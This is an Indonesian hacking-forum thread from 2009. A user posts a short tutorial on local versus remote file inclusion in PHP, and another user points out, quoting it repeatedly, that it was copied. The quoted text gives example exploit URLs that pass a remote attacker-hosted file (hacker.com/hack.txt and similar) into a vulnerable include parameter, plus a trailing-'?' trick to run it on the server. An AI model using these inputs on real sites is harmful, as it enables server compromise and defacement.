Teori dasar LFI vs RFI
Posted: Sun Oct 11, 2009 1:29 pm
berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya
The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/
bs dan di saranakn buat trik dulu di localhost baru di target pentesb0c4h wrote:abah.....cucu ijin dunlut file'a ya.....
buat simulasi di localhost bisa kan ya bah.....???
ini adalah cuplikan dari tutorial yang abah "buat"abah wrote:berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat ya
bandingkan dengan inieksploitasi RFI
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
dan isi dari abah.txt adalah
maka page tadi akan menampilkan tulisan “HACKED BY KayLa”.
ini terjadi karena isi dari abah.txt dieksekusi oleh server.
.......
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.ummiseksi.com/abah.txt);
==> maka ./http://www.ummiseksi.com/abah.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.ummiseksi.com/abah.txt tidak ada dalam server tersebut.
exploitasi RFI:
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt?
maka $page = $_GET[page] = http://www.ummiseksi.com/abah.txt?.php
nah .php oleh server akan diabaikan.
tuk link artikel yg asli (belum diedit, yg asli dari cupu-zone.com, tapi situs tersebut sudah gak ada sekarang)misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.hacker.com/hack.txt);
==> maka ./http://www.hacker.com/hack.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.hacker.com/hack.txt tidak ada dalam server tersebut.
maksdunya anda apaarira wrote:bro abah, ini artikelnya bikinan abah sendiri bukan ya?? kok sembarangan main edit
ini adalah cuplikan dari tutorial yang abah "buat"abah wrote:berhubung waktu ane menulis disini muncul kata yang ane kurang paham ya jadi ane upload aja silahkan di cicipi ya cuman tutorial bodoh dari ane. silahkan di lihat yabandingkan dengan inieksploitasi RFI
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
dan isi dari abah.txt adalah
maka page tadi akan menampilkan tulisan “HACKED BY KayLa”.
ini terjadi karena isi dari abah.txt dieksekusi oleh server.
.......
misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.ummiseksi.com/abah.txt);
==> maka ./http://www.ummiseksi.com/abah.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.ummiseksi.com/abah.txt tidak ada dalam server tersebut.
exploitasi RFI:
http://localhost/lfi.php?page=http://www.ummiseksi.com/abah.txt?
maka $page = $_GET[page] = http://www.ummiseksi.com/abah.txt?.php
nah .php oleh server akan diabaikan.tuk link artikel yg asli (belum diedit, yg asli dari cupu-zone.com, tapi situs tersebut sudah gak ada sekarang)misalkan kita memanggil url
http://localhost/lfi.php?page=http://www.hacker.com/hack.txt
maka baris ketika code php kita , yaitu include akan menjadi
include(”./”.http://www.hacker.com/hack.txt);
==> maka ./http://www.hacker.com/hack.txt akan dianggap sebagai file dan server akan mencari file tersebut.
tentu saja akan error karena file ./http://www.hacker.com/hack.txt tidak ada dalam server tersebut.
1. http://jeky466.blogsome.com/2008/05/26/about-lfirfi/
2. http://www.jasakom.com/forum/viewtopic. ... 6&start=15
tuk temen2 yang lain, liat yg ini juga ya
http://xcode.or.id/forum2/viewtopic.php ... 30#p214139
maaf bro abah, bukan maksud saya mencari2 kesalahan sampeyan, tapi sayang sekali dua postingan tersebut saya pernah baca dan kenal betul siapa penulis/pembuat aslinya....peace bro